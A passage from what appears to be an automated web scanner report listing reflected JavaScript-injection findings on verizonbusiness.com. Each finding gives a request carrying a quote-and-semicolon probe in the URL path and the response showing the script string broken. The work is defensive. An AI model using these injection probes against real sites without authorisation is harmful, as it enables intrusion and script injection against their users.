Expires: Mon, 16 Nov 2009 18:36:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutionsc7bc9';b238e65321e/cloud/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.929. http://www.verizonbusiness.com/solutions/bysolutions/cloud/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/cloud/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43a93"%3bedb1b3a8e99 was submitted in the REST URL parameter 3. This input was echoed as 43a93";edb1b3a8e99 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/cloud43a93"%3bedb1b3a8e99/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:36:49 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 43090
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:49 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
{}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions/cloud43a93";edb1b3a8e99/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.930. http://www.verizonbusiness.com/solutions/bysolutions/cloud/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/cloud/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8613'%3b3fbd2f7b347 was submitted in the REST URL parameter 3. This input was echoed as b8613';3fbd2f7b347 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/cloudb8613'%3b3fbd2f7b347/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:37:30 GMT
Content-Type: text/html
Content-Length: 43090
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:30 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutions/cloudb8613';3fbd2f7b347/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.931. http://www.verizonbusiness.com/solutions/bysolutions/contact-center/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/contact-center/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7573'%3be993577b079 was submitted in the REST URL parameter 1. This input was echoed as f7573';e993577b079 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsf7573'%3be993577b079/bysolutions/contact-center/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:12 GMT
Content-Type: text/html
Content-Length: 40674
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:12 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutionsf7573';e993577b079/bysolutions/contact-center/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.932. http://www.verizonbusiness.com/solutions/bysolutions/contact-center/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/contact-center/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a936"%3b161636c6ba6 was submitted in the REST URL parameter 1. This input was echoed as 6a936";161636c6ba6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions6a936"%3b161636c6ba6/bysolutions/contact-center/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:07 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40672
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:07 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions6a936";161636c6ba6/bysolutions/contact-center/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINI
...[SNIP]...

1.933. http://www.verizonbusiness.com/solutions/bysolutions/contact-center/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/contact-center/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45e9d'%3b1989311e036 was submitted in the REST URL parameter 2. This input was echoed as 45e9d';1989311e036 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions45e9d'%3b1989311e036/contact-center/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:36:59 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 41884
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutions45e9d';1989311e036/contact-center/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.934. http://www.verizonbusiness.com/solutions/bysolutions/contact-center/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/contact-center/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f868"%3b1ad0efe4e7f was submitted in the REST URL parameter 2. This input was echoed as 1f868";1ad0efe4e7f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions1f868"%3b1ad0efe4e7f/contact-center/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:33 GMT
Content-Type: text/html
Content-Length: 41886
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:33 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:33 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions1f868";1ad0efe4e7f/contact-center/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.935. http://www.verizonbusiness.com/solutions/bysolutions/contact-center/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/contact-center/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8c58'%3b3bcb7af0e14 was submitted in the REST URL parameter 3. This input was echoed as b8c58';3bcb7af0e14 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/contact-centerb8c58'%3b3bcb7af0e14/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:37:39 GMT
Content-Type: text/html
Content-Length: 43110
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:39 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:39 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutions/contact-centerb8c58';3bcb7af0e14/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.936. http://www.verizonbusiness.com/solutions/bysolutions/contact-center/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/contact-center/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9211e"%3bd0259aad6f9 was submitted in the REST URL parameter 3. This input was echoed as 9211e";d0259aad6f9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/contact-center9211e"%3bd0259aad6f9/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:37:26 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43108
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:26 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions/contact-center9211e";d0259aad6f9/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.937. http://www.verizonbusiness.com/solutions/bysolutions/continuity/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/continuity/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f27de"%3b516b3016ace was submitted in the REST URL parameter 1. This input was echoed as f27de";516b3016ace in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsf27de"%3b516b3016ace/bysolutions/continuity/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:34:24 GMT
Content-Type: text/html
Content-Length: 40666
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:34:24 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:34:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutionsf27de";516b3016ace/bysolutions/continuity/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM
...[SNIP]...

1.938. http://www.verizonbusiness.com/solutions/bysolutions/continuity/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/continuity/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c94b'%3bd774a2fe2d6 was submitted in the REST URL parameter 1. This input was echoed as 6c94b';d774a2fe2d6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions6c94b'%3bd774a2fe2d6/bysolutions/continuity/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:14 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40666
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:15 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions6c94b';d774a2fe2d6/bysolutions/continuity/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.939. http://www.verizonbusiness.com/solutions/bysolutions/continuity/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/continuity/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8804f"%3b7ffa565d19a was submitted in the REST URL parameter 2. This input was echoed as 8804f";7ffa565d19a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions8804f"%3b7ffa565d19a/continuity/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:38 GMT
Content-Type: text/html
Content-Length: 41878
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:38 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:38 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions8804f";7ffa565d19a/continuity/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.940. http://www.verizonbusiness.com/solutions/bysolutions/continuity/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/continuity/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1901'%3b31bdf9dc4e was submitted in the REST URL parameter 2. This input was echoed as d1901';31bdf9dc4e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutionsd1901'%3b31bdf9dc4e/continuity/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:07 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 41874
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:07 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutionsd1901';31bdf9dc4e/continuity/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.941. http://www.verizonbusiness.com/solutions/bysolutions/continuity/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/continuity/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae3e5'%3b8130fc85545 was submitted in the REST URL parameter 3. This input was echoed as ae3e5';8130fc85545 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/continuityae3e5'%3b8130fc85545/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
